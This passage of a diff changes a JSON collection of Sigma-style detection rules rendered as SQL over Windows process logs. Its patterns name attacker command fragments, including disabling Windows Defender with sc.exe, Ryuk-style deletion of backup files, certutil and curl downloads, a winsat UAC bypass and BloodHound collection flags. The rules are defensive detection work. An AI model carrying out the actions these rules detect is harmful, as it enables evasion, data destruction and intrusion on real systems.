'%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.defense_evasion", - "attack.t1197" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "status": "experimental", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087.001" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects the execution of a renamed office binary", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file download using curl.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by a software developer." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring 